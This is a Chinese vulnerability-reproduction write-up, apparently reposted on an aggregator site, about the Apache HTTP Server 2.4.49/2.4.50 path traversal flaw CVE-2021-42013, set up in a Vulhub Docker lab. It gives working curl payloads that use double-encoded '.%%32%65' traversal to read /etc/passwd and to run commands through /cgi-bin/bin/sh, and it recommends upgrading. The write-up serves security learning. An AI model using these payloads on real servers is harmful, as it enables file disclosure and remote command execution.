【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)

这篇具有很好参考价值的文章主要介绍了【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

说明 内容
漏洞编号 CVE-2021-42013
漏洞名称 Apache HTTP_2.4.50_路径穿越漏洞
漏洞评级 高危
影响范围 2.4.49
2.4.50
漏洞描述 CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件。
修复方案 升级至最新版本

1.1、漏洞描述

CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件

此漏洞影响Apache HTTP Server 2.4.49和2.4.50,而不影响更早版本。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49以及2.4.50两个版本

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-42013


启动测试环境:

docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到Apache HTTP ServerIt works!

【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013),# 漏洞复现,apache,http,网络协议,漏洞复现

2、漏洞扫描

【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013),# 漏洞复现,apache,http,网络协议,漏洞复现

3、漏洞验证

Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞

但可以使用.%%32%65进行绕过(注意其中的/icons/必须是一个存在且可访问的目录)

方式一 curl
 curl -v --path-as-is http://192.168.80.141:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013),# 漏洞复现,apache,http,网络协议,漏洞复现

在服务器上启用mods cgi或cgid后,此路径遍历漏洞将允许执行任意命令

 curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013),# 漏洞复现,apache,http,网络协议,漏洞复现

方式二 bp抓捕

【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013),# 漏洞复现,apache,http,网络协议,漏洞复现

【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013),# 漏洞复现,apache,http,网络协议,漏洞复现

1.5、修复建议

升级至最新版本文章来源地址https://www.toymoban.com/news/detail-743029.html

到了这里,关于【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 框架漏洞-CVE复现-Apache Shiro+Apache Solr

    什么是框架?        就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。          如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于

    2024年02月16日
    浏览(27)
  • 漏洞复现 | Apache Shiro 授权绕过漏洞(CVE-2022-32532)

    0x00 漏洞描述         Apache Shiro 是一套用于执行认证、授权、加密和会话管理的 Java 安全框架。2022年06月29日 APache 官方发布了一则关于 Apache Shiro 的安全通告,Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用带有 “.” 的正则时,可能会导致权限绕过。漏洞源于 RegExPatter

    2024年02月02日
    浏览(32)
  • apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50

      目录 准备工作 Apache多后缀解析漏洞复现 漏洞复现 漏洞防御 Apache换行解析漏洞复现(CVE-2017-15715) 漏洞复现 漏洞防御 CVE-2021-41773 漏洞复现 CVE-2021-42013 漏洞复现 环境:下载docker 和 vulhub 安装包:蚁剑安装包(百度网盘 我的资源安装包蚁剑winlinux安装包AntSword-Loader-v4.0.3-w

    2024年02月15日
    浏览(32)
  • 漏洞复现:Apache Spark 命令注入(CVE-2022-33891)

      Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。Spark是UC Berkeley AMP lab (加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架,Spark,拥有Hadoop MapReduce所具有的优点;但不同于MapReduce的是——Job中间输出结果可以保存在内存中,从而不再需

    2024年02月09日
    浏览(32)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版

    2024年02月11日
    浏览(37)
  • 中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-IIS-短文件解析蓝屏等 2、中间件-Nginx-文件解析命令执行等 3、中间件-Apache-RCE目录遍历文件解析等 4、中间件

    2024年02月07日
    浏览(38)
  • Apache HTTPD (CVE-2017-15715)换行解析漏洞复现

    组件版本漏洞名称 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 漏洞描述 ​ Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时, 1.phpx0A 将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 原理 apache-CVE-2017-1

    2024年02月09日
    浏览(30)
  • 【漏洞复现】Apache_HTTPD_换行解析漏洞(CVE-2017-15715)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-15715 漏洞名称 Apache HTTPD 换行解析漏洞 漏洞评级 高危 影响范围 2.4.0~2.4.29 漏洞描述 在解析PHP时, 1.phpx0A 将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略 修复方案

    2024年02月05日
    浏览(34)
  • 服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

    目录 一、导图 二、ISS漏洞 中间件介绍 1、短文件 2、文件解析 3、HTTP.SYS 4、cve-2017-7269 三、Nignx漏洞 中间件介绍 1、后缀解析漏洞 2、cve-2013-4547 3、cve-2021-23017 无 EXP 4、cve-2017-7529 意义不大 四、Apache漏洞 中间件介绍 1、漏洞版本简介 2、cve-2021-42013 3、cve-2021-41773 4、cve-2017-1571

    2024年02月10日
    浏览(50)
  • [漏洞复现]Apache Struts2/S2-015 (CVE-2013-2135)

    2.3.14.3 之前的 Apache Struts 2 允许远程攻击者通过一个包含“${}”和“%{}”序列的特制值的请求执行任意 OGNL 代码,这会导致 OGNL 代码被评估两次。 春秋云境.com 进入靶场 开始复现 构造好payload,弹nc 就构造好的payload,url编码 接入我们的ip后面,同时本地打开nc监听 把靶场关了,

    2024年01月25日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包